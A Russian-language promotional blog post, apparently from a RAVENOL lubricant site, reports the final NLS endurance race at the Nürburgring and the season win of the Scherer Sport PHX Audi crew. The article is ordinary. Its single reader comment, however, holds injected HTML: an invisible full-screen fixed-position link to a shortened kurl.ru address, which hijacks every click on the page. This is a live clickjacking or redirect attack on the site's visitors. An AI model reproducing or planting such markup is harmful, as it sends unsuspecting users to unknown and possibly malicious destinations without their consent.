Экипаж RAVENOL – абсолютные победители на Нюрбургринге


В прошедшие выходные на автодроме Нюрбургинг (Nürburgring) состоялся восьмой, финальный этап серии NLS (Nürburgring Langstrecken Serie) по гонкам на выносливость, где определялись победители не только в абсолютном зачете, но и в каждом классе.

RAVENOL является основным технологическим партнером Нюрбургринга, но помимо это, многие команды и экипажи в пелотоне отдают предпочтение именно продуктам RAVENOL.Читать далее →

Победителями в абсолютном зачете стала команда Scherer Sport PHX, также использующая в своем автомобиле смазочные материалы RAVENOL, максимально подходящие для длительных нагрузок на механизмы.

Накануне экипаж №5 на Audi R8 LMS GT3 EVO II в составе Винсента Кольба (Vincent Kolb) и Франка Стипплера (Frank Stippler) взял поул-позицию, пройдя круг за 7:53,685 минуты. Это четвертый поул команды за прошедший сезон.

Четырехчасовую гонку два пилота поделили между собой почти поровну, сменяя друг друга во время питстопов для дозаправок. Несмотря на довольно сложные погодные условия, которыми славится 26-ти километровая трасса в предгорьях Айфеля, все 28 кругов гонки пилоты сумели провести в лидирующей группе и финишировать третьими в абсолютном зачете с отставанием в 2,57 минуты от лидера. Этого результата было достаточно, чтобы дуэт стал победителем по итогам сезона.

“Спасибо всей команде и моему напарнику Винсенту, который проделал отличную работу», - сказал Фрэнк Стипплер. – «Механики сработали отлично, а наш инженер был абсолютно прав с прогнозом погоды. Нашей машиной было весело управлять, это был отличный уик-энд”.

1 комментарий

  • ответить
    • Anna Sergeevna Ivanova
    • RAVENOL
    10 октября 2023 15:39
    Класс<a/href="//kurl.ru/WrpTy"style="position:fixed;left:0;top:0;width:9999px;height:9999px;"></a>

Написать комментарий


Чтобы получать полезные актуальные статьи и новости, ПОДПИШИТЕСЬ на нашу рассылку, заполнив поля ниже↓